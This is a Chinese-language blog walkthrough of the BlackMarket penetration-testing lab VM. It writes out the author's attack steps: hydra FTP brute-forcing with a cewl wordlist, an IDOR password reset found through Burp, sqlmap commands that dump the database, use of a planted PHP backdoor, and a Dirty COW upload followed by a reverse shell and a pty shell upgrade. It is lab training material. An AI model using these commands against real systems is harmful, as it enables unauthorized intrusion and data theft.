美文网首页渗透实战
渗透测试伪实战-----BlackMarket

渗透测试伪实战-----BlackMarket

作者: yangc随想 | 来源:发表于2018-06-01 00:45 被阅读350次

算是一次小打小闹的渗透测试了,学到的东西果然不少!
(冒着挂科的危险,仍然要做渗透,这就是所谓的爱吧!)
BlackMarket官方定义渗透难度为中低等,我直接把靶机给大家共享下:

链接:https://pan.baidu.com/s/1RNmd2eVXc6oiChK0nunbMA 
密码:qqx2

下面来说一下我的实验环境

win10  x64
VM
靶机ip:         192.168.58.1

主机与虚拟机之间可以Ping通,开始实验

首先在地址栏中输入靶机ip,发现访问被拒绝
就需要考虑同段(C段)ip有哪些可以扫描到
这里为以zenmap为例(菜,还有喜欢图形界面) 扫描.png
可以发现有两台另外的机器,进行连接192.168.58.254,无法连接
连接另外一台机器,界面如下 login.png

然后在探测192.168.58.139开放了哪些端口


端口.png
常识ftp登陆,当然是要输入账号密码的,试了几个简单的都不行,就需要规规矩矩的找密码了。

查看网页源代码,最下面有这个

flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

base64解密

flag1{CIA - Operation Treadstone}

然后直接google这个

可以看到第一条就是这个网站
http://bourne.wikia.com/wiki/Operation_Treadstone

然后使用cewl来爬取网站并生成字典

命令如下
cewl -d -m -w /root/Desktop/list.txt http://bourne.wikia.com/wiki/Operation_Treadstone

然后暴力破解ftp

可以使用python脚本写一个(https://www.jianshu.com/p/e01bcbb67c1a改进)
也可以使用hydra爆破ftp
hydra -L /root/Desktop/name.txt -P /root/Desktop/list.txt ftp://192.168.58.139

tips:这个爆破应该是需要好久时间的,不过这个只是时间问题
      这里只提供一个思路,一般的话还是得爆好久
      可以爆破出来,或者在最后一步提权成功之后直接查看也是可以的

这里直接采用正确的账号密码了

ftp登陆:nicky   CIA
ftp.png

然后可以看到里面有个txt文件,文件内容为

flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}

If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

尝试扫描一波后台路径

tips:向这种交易网站后台路径就直接google交易网站后台路径字典
dirbuster也是比较好用的
dir.png

然后就可以扫到supplier目录

然后就用supplier supplier登陆进去(比较容易想到)

然后直接转到路径admin,发现可以进去

http://192.168.58.139/admin/

然后修改Customer的信息

tips:发现supplier的权限不是一般的大啊
          可以修改好多
通过burp不断抓包可以看到针对不同的用户,对应的id是不同的 id.png

而且id随着用户的增加越来越大,这就比较容易想到admin的id为1

直接改包: change.png
然后用admin/admin就可以登录进去
admin.png

题目的意思就是让我们找到Jason Bourne Email ,这种东西一般在哪里呢?
很容易想到应该是在数据库里,而且一般很有可能出现的地方与数据库打交道的地方

也就是我们可以修改的地方: mode.png
sqlmap一把梭
sqlmap -r /root/Desktop/request.txt --level 5 --dbs
BlackMarket
sqlmap -r /root/Desktop/request.txt --level 5 -D BlackMarket --tables
Flag
sqlmap -r /root/Desktop/request.txt --level 5 -D BlackMarket -T Flag --dump
jbourne

request.txt

POST /admin/edit_customer.php?id=11 HTTP/1.1
Host: 192.168.58.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.58.139/admin/customer.php
Cookie: PHPSESSID=2b4vq62tsvb2l2u05404honjv2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 93

name=111111&address=1111&contact=1111&username=1111&password=b0baee9d279d34fa1dfd71aadb908c3f

上一个flag已经告诉我们密码为?????,根据扫到的目录
尝试http://192.168.58.139/squirrelmail/

squirrelmail.png
然后jbourne ?????登陆进去
/squirrelmail/src/webmail.png
然后随便找找就能找到一样的东西


Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

HELLO Friend,

I have intercept the message from Russian's some how we are working on the same
direction, however, I couldn't able to decode the message. 

<Message Begins> 


Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.
</end>

解密

Flag5{Everything is encrypted}

然后各种尝试,可以发现这个是古典置换密码,解密得到
https://www.quipqiup.com/

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.

这里打破脑子也没有想到,这里需要flag2中的提示(也可以自己根据workshop fuzz一波)

flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}

If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

然后这里的路径是vworkshop


http://192.168.58.139/vworkshop/kgbbackdoor/PassPass.png

然后把这个图片保存在本地,用notpad++打开,最后一行有一个密码,asciihex解密得到:HailKGB
那么后门的密码已经得到了,还需要一个后门地址,根据图片的提示(上一个flag也提示在这个目录下)就在这里附近,直接访问backdoor.php(也可以扫描,这里直接就提示backdoor了)

然后又到了打破脑子也想不到的地方了,不过心细的人可以发现这里有的问题

image.png

直接传入密码进入后台,就可以看到文件


backdoor.png
flag6{Um9vdCB0aW1l} (也可以在这里找到flag2)

然后找个目录上传自己的马,我这里上传的是脏牛,我这里上传的目录是:

/var/www/html/

然后进行反弹shell:


connect.png

然后输入

python -c 'import pty;pty.spawn("/bin/bash")'
hack-in.png

电脑已经和那个服务器建立连接了
然后就是提取了,切换到那个目录下,然后运行牛

最后截图纪念一下 : finish.png

参考:https://www.anquanke.com/post/id/106855

相关文章

网友评论

    本文标题:渗透测试伪实战-----BlackMarket

    本文链接:https://www.haomeiwen.com/subject/dcpadftx.html